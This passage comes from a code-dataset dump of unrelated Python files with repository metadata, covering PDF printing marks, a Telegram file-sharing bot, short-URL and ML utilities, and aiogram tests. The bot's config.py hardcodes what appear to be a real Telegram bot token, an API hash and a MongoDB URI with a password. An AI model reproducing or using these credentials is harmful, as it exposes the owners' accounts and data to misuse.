parts\n arcs_outer = canvas.beginPath()\n c = l / 2 - line_t / 2\n a = c - circle_r1\n b 
= c + circle_r1\n x1, y1 = get_abpath2(\n a, a\n ) # Same relative coordinate values are not same in abs different basis\n x2, y2 = get_abpath2(b, b)\n arcs_outer.arc(x1, y1, x2, y2, startAng=180, extent=90)\n arcs_outer.arc(x1 + line_t, y1, x2 + line_t, y2, startAng=270, extent=90)\n arcs_outer.arc(\n x1 + line_t, y1 + line_t, x2 + line_t, y2 + line_t, startAng=0, extent=90\n )\n arcs_outer.arc(x1, y1 + line_t, x2, y2 + line_t, startAng=90, extent=90)\n canvas.drawPath(arcs_outer, fill=0, stroke=1)\n\n # inner circle parts\n arcs_inner = canvas.beginPath()\n a = c - circle_r2\n b = c + circle_r2\n x1, y1 = get_abpath2(a, a)\n x2, y2 = get_abpath2(b, b)\n xc, yc = get_abpath2(l / 2, l / 2)\n d = line_t / 2\n arcs_inner.moveTo(xc - d, yc - d)\n arcs_inner.arcTo(x1, y1, x2, y2, startAng=180, extent=90)\n arcs_inner.moveTo(xc + d, yc - d)\n arcs_inner.arcTo(x1 + line_t, y1, x2 + line_t, y2, startAng=270, extent=90)\n arcs_inner.moveTo(xc + d, yc + d)\n arcs_inner.arcTo(\n x1 + line_t, y1 + line_t, x2 + line_t, y2 + line_t, startAng=0, extent=90\n )\n arcs_inner.moveTo(xc - d, yc + d)\n arcs_inner.arcTo(x1, y1 + line_t, x2, y2 + line_t, startAng=90, extent=90)\n\n canvas.drawPath(arcs_inner, fill=1, stroke=0)\n\n def generate_template(\n self, manuscript: Manuscript\n ) -> Tuple[pypdf.PdfFileReader, BytesIO]:\n self.manu_paper_format = manuscript.file_paper_format\n paper_format = self.__get_paper_dim(self.manu_paper_format)\n\n tem_byte = io.BytesIO()\n printing_template = Canvas(tem_byte, pagesize=paper_format)\n\n if self.crop:\n self.__draw_crop_lines(printing_template)\n if self.reg:\n self.__draw_registration(printing_template)\n if self.cmyk:\n self.__draw_color_marker(printing_template)\n printing_template.showPage()\n printing_template.save()\n\n tem_byte.seek(0)\n template_pdf = pypdf.PdfFileReader(tem_byte)\n\n return template_pdf, tem_byte\n\n def do(\n self, index: int, manuscript: Manuscript, file_mode: str = \"safe\"\n ) -> NoReturn:\n\n if not self.on:\n pass\n else:\n new_pdf, new_file = self.get_new_pdf(index, manuscript, file_mode)\n template_pdf, tem_byte = self.generate_template(manuscript)\n template = template_pdf.pages[0]\n for i, page in enumerate(manuscript.pages):\n temp_page = copy(template)\n page.addTransformation(\n pypdf.Transformation().translate(tx=self.margin, ty=self.margin)\n )\n upper = float(page.mediaBox[2])\n right = float(page.mediaBox[3])\n page.mediaBox.setUpperRight((upper + self.margin, right + self.margin))\n\n temp_page.merge_page(page)\n new_pdf.add_page(temp_page)\n\n new_pdf.write(new_file)\n\n manuscript.pdf_update(new_pdf, new_file)\n", "repo_name": "HornPenguin/Booklet", "sub_path": "booklet/core/templates/printingmark.py", "file_name": "printingmark.py", "file_ext": "py", "file_size_in_byte": 14082, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "booklet.core.manuscript.Template", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 78, "usage_type": "name"}, {"api_name": "reportlab.pdfgen.canvas.Canvas", "line_number": 84, "usage_type": "name"}, {"api_name": "booklet.utils.conversion.mm", "line_number": 88, "usage_type": "name"}, {"api_name": "reportlab.pdfgen.canvas.Canvas", "line_number": 94, "usage_type": 
"name"}, {"api_name": "reportlab.pdfgen.canvas.Canvas", "line_number": 110, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 196, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 197, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 198, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 199, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 215, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 217, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 218, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 219, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 220, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 221, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 222, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 223, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 224, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 240, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 294, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 241, "usage_type": "name"}, {"api_name": "typing.Literal", "line_number": 241, "usage_type": "name"}, {"api_name": "reportlab.pdfgen.canvas.Canvas", "line_number": 303, "usage_type": "name"}, {"api_name": "booklet.utils.color.Basis_Colors", "line_number": 323, "usage_type": "name"}, {"api_name": "booklet.utils.color.Basis_Colors", "line_number": 324, "usage_type": "name"}, {"api_name": "booklet.core.manuscript.Manuscript", "line_number": 366, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 371, "usage_type": "call"}, {"api_name": "reportlab.pdfgen.canvas.Canvas", "line_number": 372, "usage_type": "call"}, {"api_name": "PyPDF2.PdfFileReader", "line_number": 384, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 367, "usage_type": "name"}, {"api_name": "PyPDF2.PdfFileReader", "line_number": 367, "usage_type": "attribute"}, {"api_name": "io.BytesIO", "line_number": 367, "usage_type": "name"}, {"api_name": "booklet.core.manuscript.Manuscript", "line_number": 389, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 399, "usage_type": "call"}, {"api_name": "PyPDF2.Transformation", "line_number": 401, "usage_type": "call"}]} +{"seq_id": "9553939884", "text": "#(©)CodeXBotz\n\n\n\n\nimport os\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\n\n\n#Bot token @Botfather\nTG_BOT_TOKEN = \"5786017840:AAEsbeA-1QUdr_0Stp3Bg8V0ov0kxl1A_28\"\n\n#Your API ID from my.telegram.org\nAPP_ID = 3845818\n\n#Your API Hash from my.telegram.org\nAPI_HASH = \"95937bcf6bc0938f263fc7ad96959c6d\"\n\n#Your db channel Id\nCHANNEL_ID = -1001441020553\n\n#OWNER ID\nOWNER_ID = 1443454117\n\n#Port\nPORT = \"8082\"\n\n#Database \nDB_URI = \"mongodb+srv://anime:2004@cluster0.ghzkqob.mongodb.net/?retryWrites=true&w=majority\" \nDB_NAME = \"filesharexbot\"\n\n#force sub channel id, if you want enable force sub\nFORCE_SUB_CHANNEL = -1001298683832\n\nTG_BOT_WORKERS = 4\n\n#start message\nSTART_MSG = \"Hey! {first}\\n\\nI am currently serving for @animxt.\"\nADMINS=[1863307059, 1425489930]\n\n#Force sub message \nFORCE_MSG = 'Hey! 
{mention},\\n\\nKindly join the channel & try again to get the files.'\n\n#set your Custom Caption here, Keep None for Disable Custom Caption\nCUSTOM_CAPTION = \"@animxt\"\n\n#set True if you want to prevent users from forwarding files from bot\nPROTECT_CONTENT = \"True\"\n\n#Set true if you want Disable your Channel Posts Share button\nDISABLE_CHANNEL_BUTTON = \"True\"\n\nBOT_STATS_TEXT = \"BOT UPTIME\\n{uptime}\"\nUSER_REPLY_TEXT = \"❌Don't send me messages directly I'm only File Share bot!\"\n\nLOG_FILE_NAME = \"filesharingbot.txt\"\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"[%(asctime)s - %(levelname)s] - %(name)s - %(message)s\",\n datefmt='%d-%b-%y %H:%M:%S',\n handlers=[\n RotatingFileHandler(\n LOG_FILE_NAME,\n maxBytes=50000000,\n backupCount=10\n ),\n logging.StreamHandler()\n ]\n)\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\n\n\ndef LOGGER(name: str) -> logging.Logger:\n return logging.getLogger(name)\n", "repo_name": "Rindo55/diamond", "sub_path": "config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1846, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 61, "usage_type": "attribute"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 65, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 70, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 73, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.Logger", "line_number": 76, "usage_type": "attribute"}]} +{"seq_id": "18106361685", "text": "import pytest\n\nfrom aiogram import types\n\nfrom manga_notify.bot import callback_data\n\n\ndef test_serializetion():\n data = callback_data.CallbackData(\n method='my_method',\n payload={\n 'hello': 'world',\n },\n )\n serialized = data.serialize()\n assert serialized\n assert data == callback_data.parse(serialized)\n\n\n@pytest.mark.parametrize(\n 'matcher_method, is_matched',\n (\n pytest.param(\n 'my_method',\n True,\n id='match',\n ),\n pytest.param(\n 'another_method',\n False,\n id='do_not_match',\n ),\n )\n)\ndef test_matcher(matcher_method, is_matched):\n data = callback_data.CallbackData(\n method='my_method',\n payload={},\n )\n serialized = data.serialize()\n query = types.CallbackQuery(\n id='1',\n from_user=types.User(id=1, is_bot=False, first_name='user'),\n chat_instance='chat_instance',\n data=serialized,\n )\n matcher = callback_data.create_matcher(matcher_method)\n assert matcher(query) == is_matched\n", "repo_name": "IsThisLoss/manga-notify", "sub_path": "tests/bot/test_callback_data.py", "file_name": "test_callback_data.py", "file_ext": "py", "file_size_in_byte": 1101, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "manga_notify.bot.callback_data.CallbackData", "line_number": 9, "usage_type": "call"}, {"api_name": "manga_notify.bot.callback_data", "line_number": 9, "usage_type": "name"}, {"api_name": "manga_notify.bot.callback_data.parse", "line_number": 17, "usage_type": "call"}, {"api_name": "manga_notify.bot.callback_data", "line_number": 17, "usage_type": "name"}, {"api_name": "manga_notify.bot.callback_data.CallbackData", "line_number": 
36, "usage_type": "call"}, {"api_name": "manga_notify.bot.callback_data", "line_number": 36, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 41, "usage_type": "call"}, {"api_name": "aiogram.types", "line_number": 41, "usage_type": "name"}, {"api_name": "aiogram.types.User", "line_number": 43, "usage_type": "call"}, {"api_name": "aiogram.types", "line_number": 43, "usage_type": "name"}, {"api_name": "manga_notify.bot.callback_data.create_matcher", "line_number": 47, "usage_type": "call"}, {"api_name": "manga_notify.bot.callback_data", "line_number": 47, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 20, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytest.param", "line_number": 23, "usage_type": "call"}, {"api_name": "pytest.param", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "32379681965", "text": "import os\nfrom typing import Any\n\nimport requests\n\nfrom domains.models import Domain\nfrom .base import BaseShortUrlProvider\nfrom ..exceptions import ShortUrlProviderError\n\n\nclass FirebaseDynamicLinksShortUrlProvider(BaseShortUrlProvider):\n host = 'https://firebasedynamiclinks.googleapis.com'\n api_key = os.environ.get(\"FIREBASE_WEB_API_KEY\")\n\n def list_short_urls(self, domain: Domain) -> list[dict[str, Any]]:\n raise ShortUrlProviderError()\n\n def create_short_url(self, domain: Domain, **kwargs) -> dict[str, Any]:\n request_body = {\n 'dynamicLinkInfo': {\n 'domainUriPrefix': f'https://{domain.name}',\n 'link': kwargs.get('long_url'),\n },\n 'suffix': {\n 'option': 'SHORT'\n }\n }\n response = requests.post(self.host + '/v1/shortLinks',\n params={'key': self.api_key}, json=request_body)\n try:\n response.raise_for_status()\n except requests.HTTPError:\n raise ShortUrlProviderError(response.json())\n from shorturls.models import ShortUrl\n return {\n 'short': ShortUrl.split_short_url(response.json()['shortLink'])[-1],\n }\n\n def retrieve_short_url(self, domain: Domain, short: str) -> dict[str, Any] | None:\n raise ShortUrlProviderError()\n\n def update_short_url(self, domain: Domain, short: str, **kwargs) -> dict[str, Any]:\n raise ShortUrlProviderError()\n\n def delete_short_url(self, domain: Domain, short: str) -> None:\n raise ShortUrlProviderError()\n\n def get_hostname(self, domain: Domain) -> str:\n return 'web.app'\n", "repo_name": "sjy5386/flare-core", "sub_path": "shorturls/providers/firebase.py", "file_name": "firebase.py", "file_ext": "py", "file_size_in_byte": 1681, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.BaseShortUrlProvider", "line_number": 11, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "domains.models.Domain", "line_number": 15, "usage_type": "name"}, {"api_name": "exceptions.ShortUrlProviderError", "line_number": 16, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 15, "usage_type": "name"}, {"api_name": "domains.models.Domain", "line_number": 18, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 28, "usage_type": "call"}, {"api_name": "requests.HTTPError", "line_number": 32, "usage_type": "attribute"}, {"api_name": "exceptions.ShortUrlProviderError", "line_number": 33, "usage_type": "call"}, {"api_name": "shorturls.models.ShortUrl.split_short_url", 
"line_number": 36, "usage_type": "call"}, {"api_name": "shorturls.models.ShortUrl", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 18, "usage_type": "name"}, {"api_name": "domains.models.Domain", "line_number": 39, "usage_type": "name"}, {"api_name": "exceptions.ShortUrlProviderError", "line_number": 40, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 39, "usage_type": "name"}, {"api_name": "domains.models.Domain", "line_number": 42, "usage_type": "name"}, {"api_name": "exceptions.ShortUrlProviderError", "line_number": 43, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 42, "usage_type": "name"}, {"api_name": "domains.models.Domain", "line_number": 45, "usage_type": "name"}, {"api_name": "exceptions.ShortUrlProviderError", "line_number": 46, "usage_type": "call"}, {"api_name": "domains.models.Domain", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "4082517443", "text": "from torch.autograd import Function\nimport fps_with_features_cuda\nimport torch\n\nclass FPS_F(Function):\n @staticmethod\n def forward(ctx,xyz:torch.tensor,predix:torch.tensor,npoints:int):\n # xyz is not only has coordinate, xyz = [x,y,z,c1,c2...,cn] shape(B,N,C)\n assert xyz.is_contiguous()\n B,N,C = xyz.size()\n m1 = predix.shape[0]\n output = torch.cuda.IntTensor(B,npoints)\n temp = torch.cuda.FloatTensor(B,N).fill_(1e10)\n fps_with_features_cuda.fps_with_features_wrapper(B, N, npoints,m1, C,xyz,predix, temp, output)\n return output\n @staticmethod\n def backward(xyz, a=None):\n return None,None\nfps_with_featres = FPS_F.apply\n\nclass FPS_D(Function):\n @staticmethod\n def forward(ctx,xyz:torch.tensor,npoint:int):\n # predix is the index of forground point (B,m2,1)\n #xyz (B,N,3)\n assert xyz.is_contiguous()\n B, N, C = xyz.size()\n output = torch.cuda.IntTensor(B, npoint)\n temp = torch.cuda.FloatTensor(B, N).fill_(1e18)\n fps_with_features_cuda.furthest_point_sampling_wrapper(B, N, npoint,xyz, temp, output)\n return output\n def backward(ctx, a = None):\n return None,None\nfps_with_distance = FPS_D.apply", "repo_name": "liangzhao123/IOU-SSD", "sub_path": "vis_points/fps_utils/fps_func_utils.py", "file_name": "fps_func_utils.py", "file_ext": "py", "file_size_in_byte": 1245, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.autograd.Function", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.cuda.IntTensor", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.cuda.FloatTensor", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 13, "usage_type": "attribute"}, {"api_name": "fps_with_features_cuda.fps_with_features_wrapper", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.autograd.Function", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.cuda.IntTensor", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.cuda.FloatTensor", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 29, "usage_type": "attribute"}, {"api_name": "fps_with_features_cuda.furthest_point_sampling_wrapper", "line_number": 30, "usage_type": "call"}]} +{"seq_id": 
"20985476757", "text": "#-*- coding=utf-8 -*-\n# 统计数据检出情况\nimport cv2\nimport sys\nimport os\nimport glob\nimport random\nsys.path.insert(0, '/home/remo/from_wdh/remodet_repository_llp/python')\n# print sys.path\nimport caffe\nimport numpy as np\nsys.path.append(\"../\")\nimport img_func as func\nimport math\nsys.path.append(\"/home/remo/from_wdh\")\nfrom detFunc import SsdDet\ncaffe.set_mode_gpu()\ncaffe.set_device(0)\n\n# 获取模型文件地址,以及测试的图像/视频的地址\n\ndef save_txt(dirs,txtx):\n for ind in xrange(len(dirs)):\n\n dirr = dirs[ind]\n if os.path.exists(os.path.dirname(dirr))==False:\n os.makedirs(os.path.dirname(dirr))\n txt = txtx[ind]\n f=open(dirr,'w')\n for obj in txt:\n st=str(obj[0])\n for ind in xrange(len(obj)):\n if ind !=0:\n st = st + ' ' + str(obj[ind])\n f.writelines(st+'\\n')\n # f.write(txtx)\n f.close()\n\ndef det_models():\n net_info = {\n\t\t\"cat_dog_fpn_ig_20w\": [0, 0, \"/home/remo/from_wdh/Det_CatDog_llp/DarkNet_fpn/test.prototxt\",\n\t\t\t\t\t\t\t \"/home/remo/from_wdh/Det_CatDog_llp/DarkNet_fpn/Models_ig/DarkNet_fpn_ig_iter_200000.caffemodel\",\n\t\t\t\t\t\t\t 0],\n }\n\n\n img_root = [\"/home/remo/from_wdh/CatDog_Videos/猫\",\"/home/remo/from_wdh/CatDog_Videos/狗\"]\n\n return net_info, img_root\n\n\n\ndef gen_det_txt(net_dic,img_roots,det=SsdDet()):\n for img_root in img_roots:# cat or dog\n print(img_root)\n img_lists0 = os.listdir(img_root)\n img_lists0 = [img_root +'/'+ pa for pa in img_lists0]\n for img_listss in img_lists0: # zishi\n img_lists = glob.glob(img_listss +'/*')\n print(img_listss.split('/')[-1])\n total = 0\n detout=0\n for num, img_name in enumerate(img_lists):\n total+=1\n if img_name.split(\".\")[-1] == 'jpg':\n img = cv2.imread(img_name)\n # 2. -------------------检测---------------------------------\n resss=det.det_txt(img)\n # print(resss)\n\n if resss!=0:\n detout+=1\n print('nodet, %d total %d'%(total-detout,total))\n\n\n\n\nif __name__ == '__main__':\n net_dict_info, img_roots = det_models()\n ssd_det = SsdDet()\n ssd_det.det_init(net_dict_info)\n gen_det_txt(net_dict_info,img_roots,ssd_det)\n\n\n\n\n", "repo_name": "UrwLee/Remo_experience", "sub_path": "dog_cat_test/mystat.py", "file_name": "mystat.py", "file_ext": "py", "file_size_in_byte": 2403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "caffe.set_mode_gpu", "line_number": 17, "usage_type": "call"}, {"api_name": "caffe.set_device", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "detFunc.SsdDet", "line_number": 53, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 56, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 59, 
"usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 66, "usage_type": "call"}, {"api_name": "detFunc.SsdDet", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "11736447115", "text": "import torch\nimport torch.nn.functional as F\n\nimport torchmetrics\nimport pytorch_lightning as pl\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\n\nclass DTI_prediction(pl.LightningModule):\n def __init__(self, model, len_train_dataloader, learning_rate):\n super().__init__()\n self.model = model\n self.len_train_dataloader = len_train_dataloader\n self.learning_rate = learning_rate\n # self.loss = torch.nn.binary\n\n def step(self, batch):\n mol_feature, prot_feat_student, prot_feat_teacher, y, source = batch\n prot_feat_teacher = prot_feat_teacher.detach()\n pred, lambda_ = self.model(mol_feature, prot_feat_student, prot_feat_teacher)\n\n loss = F.binary_cross_entropy_with_logits(pred, y)\n pred = F.sigmoid(pred)\n # loss = F.smooth_l1_loss(pred, y)\n # pred = pred.float()\n\n return pred, y, source, loss, lambda_\n\n def training_step(self, batch, batch_idx):\n _, _, _, loss, lambda_ = self.step(batch)\n\n self.log(\"train_loss\", loss, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"train_lambda_\", lambda_, on_step=True, on_epoch=True, prog_bar=False)\n\n return loss\n\n def validation_step(self, batch, batch_idx):\n preds, y, _, loss, lambda_ = self.step(batch)\n self.log(\"valid_loss\", loss, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"valid_lambda_\", lambda_, on_step=False, on_epoch=True, prog_bar=True)\n\n return {\"preds\": preds, \"target\": y}\n\n def validation_epoch_end(self, outputs):\n preds = torch.cat([tmp[\"preds\"] for tmp in outputs], 0).detach().cpu()\n targets = torch.cat([tmp[\"target\"] for tmp in outputs], 0).detach().cpu().long()\n\n auroc = torchmetrics.functional.auroc(preds, targets.long(), task=\"binary\")\n auprc = torchmetrics.functional.average_precision(\n preds, targets.long(), task=\"binary\"\n )\n self.log(\"valid_auroc\", auroc, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"valid_auprc\", auprc, on_step=False, on_epoch=True, prog_bar=True)\n\n def test_step(self, batch, batch_idx):\n preds, y, _, loss, lambda_ = self.step(batch)\n self.log(\"test_loss\", loss, on_step=False, on_epoch=True, prog_bar=True)\n\n return {\"preds\": preds, \"target\": y}\n\n def test_epoch_end(self, outputs):\n preds = torch.cat([tmp[\"preds\"] for tmp in outputs], 0).detach().cpu()\n targets = torch.cat([tmp[\"target\"] for tmp in outputs], 0).detach().cpu().long()\n\n auroc = torchmetrics.functional.auroc(preds, targets.long(), task=\"binary\")\n auprc = torchmetrics.functional.average_precision(\n preds, targets.long(), task=\"binary\"\n )\n self.log(\"test_auroc\", auroc, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"test_auprc\", auprc, on_step=False, on_epoch=True, prog_bar=True)\n\n conf_mat = torchmetrics.functional.confusion_matrix(\n preds, targets, task=\"binary\"\n )\n\n print(conf_mat)\n\n def predict_step(self, batch, batch_idx):\n pred, y, source, _, _ = self.step(batch)\n\n return pred, y, source\n\n def configure_optimizers(self):\n optimizer = torch.optim.AdamW(self.parameters(), lr=self.learning_rate)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(\n optimizer, T_max=100 * self.len_train_dataloader\n )\n\n return {\"optimizer\": optimizer, \"lr_scheduler\": scheduler}\n\n\ndef define_callbacks(PROJECT_NAME):\n callbacks = [\n 
ModelCheckpoint(\n monitor=\"valid_auprc\",\n mode=\"max\",\n save_top_k=1,\n dirpath=f\"weights/{PROJECT_NAME}\",\n filename=\"DTI-{epoch:03d}-{valid_loss:.4f}-{valid_auroc:.4f}-{valid_auprc:.4f}\",\n ),\n ]\n\n return callbacks\n", "repo_name": "jonghyunlee1993/DLM-DTI_hint-based-learning", "sub_path": "models/model_interface.py", "file_name": "model_interface.py", "file_ext": "py", "file_size_in_byte": 3893, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytorch_lightning.LightningModule", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.binary_cross_entropy_with_logits", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.functional.sigmoid", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 47, "usage_type": "call"}, {"api_name": "torchmetrics.functional.auroc", "line_number": 49, "usage_type": "call"}, {"api_name": "torchmetrics.functional", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torchmetrics.functional.average_precision", "line_number": 50, "usage_type": "call"}, {"api_name": "torchmetrics.functional", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 64, "usage_type": "call"}, {"api_name": "torchmetrics.functional.auroc", "line_number": 66, "usage_type": "call"}, {"api_name": "torchmetrics.functional", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torchmetrics.functional.average_precision", "line_number": 67, "usage_type": "call"}, {"api_name": "torchmetrics.functional", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torchmetrics.functional.confusion_matrix", "line_number": 73, "usage_type": "call"}, {"api_name": "torchmetrics.functional", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.optim.AdamW", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.CosineAnnealingLR", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.ModelCheckpoint", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "3733409349", "text": "\"\"\"Base Extractor classes\nA module for the base Extractor classes. 
The Extractor, given a session path, will extract the\nprocessed data from raw hardware files and optionally save them.\n\"\"\"\n\nimport abc\nfrom collections import OrderedDict\nimport json\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom one.alf.files import get_session_path\nfrom ibllib.io import raw_data_loaders as raw\nfrom ibllib.io.raw_data_loaders import load_settings, _logger\n\n\nclass BaseExtractor(abc.ABC):\n \"\"\"\n Base extractor class\n Writing an extractor checklist:\n - on the child class, overload the _extract method\n - this method should output one or several numpy.arrays or dataframe with a consistent shape\n - save_names is a list or a string of filenames, there should be one per dataset\n - set save_names to None for a dataset that doesn't need saving (could be set dynamically\n in the _extract method)\n :param session_path: Absolute path of session folder\n :type session_path: str/Path\n \"\"\"\n\n session_path = None\n save_names = None\n default_path = Path(\"alf\") # relative to session\n\n def __init__(self, session_path=None):\n # If session_path is None Path(session_path) will fail\n self.session_path = Path(session_path)\n\n def extract(self, save=False, path_out=None, **kwargs):\n \"\"\"\n :return: numpy.ndarray or list of ndarrays, list of filenames\n :rtype: dtype('float64')\n \"\"\"\n out = self._extract(**kwargs)\n files = self._save(out, path_out=path_out) if save else None\n return out, files\n\n def _save(self, data, path_out=None):\n # Chack if self.save_namesis of the same length of out\n if not path_out:\n path_out = self.session_path.joinpath(self.default_path)\n path_out.mkdir(exist_ok=True, parents=True)\n\n def _write_to_disk(file_path, data):\n \"\"\"Implements different save calls depending on file extension\"\"\"\n csv_separators = {\n \".csv\": \",\",\n \".ssv\": \" \",\n \".tsv\": \"\\t\",\n }\n file_path = Path(file_path)\n if file_path.suffix == \".npy\":\n np.save(file_path, data)\n elif file_path.suffix in [\".parquet\", \".pqt\"]:\n if not isinstance(data, pd.DataFrame):\n _logger.error(\"Data is not a panda's DataFrame object\")\n raise TypeError(\"Data is not a panda's DataFrame object\")\n data.to_parquet(file_path)\n elif file_path.suffix in [\".csv\", \".ssv\", \".tsv\"]:\n sep = csv_separators[file_path.suffix]\n data.to_csv(file_path, sep=sep)\n # np.savetxt(file_path, data, delimiter=sep)\n else:\n _logger.error(f\"Don't know how to save {file_path.suffix} files yet\")\n\n if self.save_names is None:\n file_paths = []\n elif isinstance(self.save_names, str):\n file_paths = path_out.joinpath(self.save_names)\n _write_to_disk(file_paths, data)\n else: # Should be list or tuple...\n assert len(data) == len(self.save_names)\n file_paths = []\n for data, fn in zip(data, self.save_names):\n if fn:\n fpath = path_out.joinpath(fn)\n _write_to_disk(fpath, data)\n file_paths.append(fpath)\n return file_paths\n\n @abc.abstractmethod\n def _extract(self):\n pass\n\n\nclass BaseBpodTrialsExtractor(BaseExtractor):\n \"\"\"\n Base (abstract) extractor class for bpod jsonable data set\n Wrps the _extract private method\n\n :param session_path: Absolute path of session folder\n :type session_path: str\n :param bpod_trials\n :param settings\n \"\"\"\n\n bpod_trials = None\n 